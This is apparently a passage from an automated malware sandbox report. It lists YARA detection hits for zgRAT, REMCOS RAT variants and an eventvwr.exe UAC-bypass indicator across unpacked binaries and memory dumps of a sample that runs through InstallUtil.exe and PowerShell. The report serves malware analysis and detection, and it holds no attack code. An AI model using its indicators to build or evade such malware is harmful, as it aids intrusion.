Source: 0.2.kyFBQxVbsg.exe.4ba0000.4.raw.unpack, type: UNPACKEDPE Matched rule: Detects zgRAT Author: ditekSHen
Source: 17.0.InstallUtil.exe.400000.3.raw.unpack, type: UNPACKEDPE Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 17.0.InstallUtil.exe.400000.3.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
Source: 17.0.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 17.0.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
Source: 28.0.InstallUtil.exe.400000.4.unpack, type: UNPACKEDPE Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 28.0.InstallUtil.exe.400000.4.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
Source: 28.0.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 28.0.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
Source: 0.2.kyFBQxVbsg.exe.4ba0000.4.unpack, type: UNPACKEDPE Matched rule: Detects zgRAT Author: ditekSHen
Source: 26.0.InstallUtil.exe.400000.6.unpack, type: UNPACKEDPE Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 26.0.InstallUtil.exe.400000.6.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
Source: 28.0.InstallUtil.exe.400000.2.unpack, type: UNPACKEDPE Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 28.0.InstallUtil.exe.400000.2.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
Source: 17.0.InstallUtil.exe.400000.2.raw.unpack, type: UNPACKEDPE Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 17.0.InstallUtil.exe.400000.2.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
Source: 17.0.InstallUtil.exe.400000.8.raw.unpack, type: UNPACKEDPE Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 17.0.InstallUtil.exe.400000.8.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
Source: 24.2.Qerdo.exe.5440000.4.raw.unpack, type: UNPACKEDPE Matched rule: Detects zgRAT Author: ditekSHen
Source: 26.0.InstallUtil.exe.400000.4.unpack, type: UNPACKEDPE Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 26.0.InstallUtil.exe.400000.4.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
Source: 26.0.InstallUtil.exe.400000.3.unpack, type: UNPACKEDPE Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 26.0.InstallUtil.exe.400000.3.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
Source: 0.2.kyFBQxVbsg.exe.38cfb10.3.raw.unpack, type: UNPACKEDPE Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 0.2.kyFBQxVbsg.exe.38cfb10.3.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
Source: 28.0.InstallUtil.exe.400000.8.unpack, type: UNPACKEDPE Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 28.0.InstallUtil.exe.400000.8.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
Source: 26.0.InstallUtil.exe.400000.3.raw.unpack, type: UNPACKEDPE Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 26.0.InstallUtil.exe.400000.3.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
Source: 19.2.Qerdo.exe.35cfb10.3.raw.unpack, type: UNPACKEDPE Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 19.2.Qerdo.exe.35cfb10.3.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
Source: 00000011.00000000.535499326.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 00000011.00000000.535499326.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: REMCOS_RAT_variants Author: unknown
Source: 00000011.00000000.533973605.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 00000011.00000000.533973605.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: REMCOS_RAT_variants Author: unknown
Source: 0000001A.00000000.594041394.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 0000001A.00000000.594041394.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: REMCOS_RAT_variants Author: unknown
Source: 0000001C.00000000.601490372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 0000001C.00000000.601490372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: REMCOS_RAT_variants Author: unknown
Source: 0000001A.00000000.592527384.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 0000001A.00000000.592527384.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: REMCOS_RAT_variants Author: unknown
Source: 00000011.00000000.536706156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 00000011.00000000.536706156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: REMCOS_RAT_variants Author: unknown
Source: 00000011.00000000.533640248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 00000011.00000000.533640248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: REMCOS_RAT_variants Author: unknown
Source: 00000011.00000000.534323754.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 00000011.00000000.534323754.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: REMCOS_RAT_variants Author: unknown
Source: 0000001A.00000000.591921739.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 0000001A.00000000.591921739.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: REMCOS_RAT_variants Author: unknown
Source: 0000001C.00000002.607934228.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 0000001C.00000002.607934228.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: REMCOS_RAT_variants Author: unknown
Source: 0000001C.00000000.598510412.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 0000001C.00000000.598510412.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: REMCOS_RAT_variants Author: unknown
Source: 0000001C.00000000.606949507.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 0000001C.00000000.606949507.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: REMCOS_RAT_variants Author: unknown
Source: 00000013.00000002.606363285.00000000048F0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Detects zgRAT Author: ditekSHen
Source: 0000001A.00000000.593660616.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 0000001A.00000000.593660616.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: REMCOS_RAT_variants Author: unknown
Source: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: REMCOS_RAT_variants Author: unknown
Source: 0000001A.00000000.594464654.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 0000001A.00000000.594464654.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: REMCOS_RAT_variants Author: unknown
Source: 0000001A.00000000.595033873.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 0000001A.00000000.595033873.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: REMCOS_RAT_variants Author: unknown
Source: 00000011.00000000.536064780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 00000011.00000000.536064780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: REMCOS_RAT_variants Author: unknown
Source: 00000000.00000002.541870137.0000000004BA0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Detects zgRAT Author: ditekSHen
Source: 0000001C.00000000.603526142.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 0000001C.00000000.603526142.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: REMCOS_RAT_variants Author: unknown
Source: 00000011.00000000.534848870.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 00000011.00000000.534848870.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: REMCOS_RAT_variants Author: unknown
Source: 0000001C.00000000.599641579.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 0000001C.00000000.599641579.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: REMCOS_RAT_variants Author: unknown
Source: 0000001C.00000000.599125899.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 0000001C.00000000.599125899.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: REMCOS_RAT_variants Author: unknown
Source: 00000018.00000002.613026227.0000000005440000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Detects zgRAT Author: ditekSHen
Source: 0000001A.00000000.593157225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 0000001A.00000000.593157225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: REMCOS_RAT_variants Author: unknown
Source: 0000001A.00000002.595851570.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 0000001A.00000002.595851570.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: REMCOS_RAT_variants Author: unknown
Source: 0000001C.00000000.606295959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 0000001C.00000000.606295959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: REMCOS_RAT_variants Author: unknown
Source: kyFBQxVbsg.exe, hlrb.cs Large array initialization: nakj: array initializer size 710623
Source: 19.2.Qerdo.exe.40000.0.unpack, hlrb.cs Large array initialization: nakj: array initializer size 710623
Source: C:\Users\user\Desktop\kyFBQxVbsg.exe Code function: 0_2_024AEAB8 0_2_024AEAB8
Source: C:\Users\user\Desktop\kyFBQxVbsg.exe Code function: 0_2_024ADA50 0_2_024ADA50
Source: C:\Users\user\Desktop\kyFBQxVbsg.exe Code function: 0_2_024AD778 0_2_024AD778
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 3_2_00C8EAF7 3_2_00C8EAF7
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 3_2_00C8AEC8 3_2_00C8AEC8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 3_2_00C8AF53 3_2_00C8AF53
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 3_2_00C8768A 3_2_00C8768A
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 3_2_00C87698 3_2_00C87698
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 3_2_00C8AF90 3_2_00C8AF90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 17_2_00435080 17_2_00435080
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 17_2_0044F09C 17_2_0044F09C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 17_2_0043420E 17_2_0043420E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 17_2_00430294 17_2_00430294
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 17_2_004422B0 17_2_004422B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 17_2_00411466 17_2_00411466
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 17_2_0041A4FE 17_2_0041A4FE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 17_2_0043C57C 17_2_0043C57C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 17_2_00434643 17_2_00434643
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 17_2_00424604 17_2_00424604
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 17_2_004496B9 17_2_004496B9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 17_2_0042476D 17_2_0042476D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 17_2_00432771 17_2_00432771
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 17_2_0043C7AB 17_2_0043C7AB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 17_2_004338FA 17_2_004338FA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 17_2_004239CC 17_2_004239CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 17_2_0043C9DA 17_2_0043C9DA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 17_2_00434A78 17_2_00434A78
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 17_2_0041BA96 17_2_0041BA96
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 17_2_00433DF6 17_2_00433DF6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 17_2_00423F5B 17_2_00423F5B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 17_2_0044FF65 17_2_0044FF65
Source: kyFBQxVbsg.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Qerdo.exe.0.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: kyFBQxVbsg.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 17.0.InstallUtil.exe.400000.5.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 17.0.InstallUtil.exe.400000.5.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 24.2.Qerdo.exe.5440000.4.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 26.0.InstallUtil.exe.400000.8.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 26.0.InstallUtil.exe.400000.8.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 17.0.InstallUtil.exe.400000.4.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 17.0.InstallUtil.exe.400000.4.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 28.0.InstallUtil.exe.400000.5.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 28.0.InstallUtil.exe.400000.5.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 28.0.InstallUtil.exe.400000.3.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 28.0.InstallUtil.exe.400000.3.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 19.2.Qerdo.exe.48f0000.4.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 26.0.InstallUtil.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 26.0.InstallUtil.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 19.2.Qerdo.exe.48f0000.4.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 28.0.InstallUtil.exe.400000.2.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 28.0.InstallUtil.exe.400000.2.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 26.0.InstallUtil.exe.400000.6.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 26.0.InstallUtil.exe.400000.6.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 26.0.InstallUtil.exe.400000.4.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 26.0.InstallUtil.exe.400000.4.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 17.0.InstallUtil.exe.400000.8.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 17.0.InstallUtil.exe.400000.8.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 17.0.InstallUtil.exe.400000.2.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 17.0.InstallUtil.exe.400000.2.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 17.0.InstallUtil.exe.400000.6.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 17.0.InstallUtil.exe.400000.6.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 28.0.InstallUtil.exe.400000.8.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 28.0.InstallUtil.exe.400000.8.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 17.0.InstallUtil.exe.400000.3.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 17.0.InstallUtil.exe.400000.3.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 26.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 26.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 28.0.InstallUtil.exe.400000.5.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 28.0.InstallUtil.exe.400000.5.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 28.0.InstallUtil.exe.400000.4.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
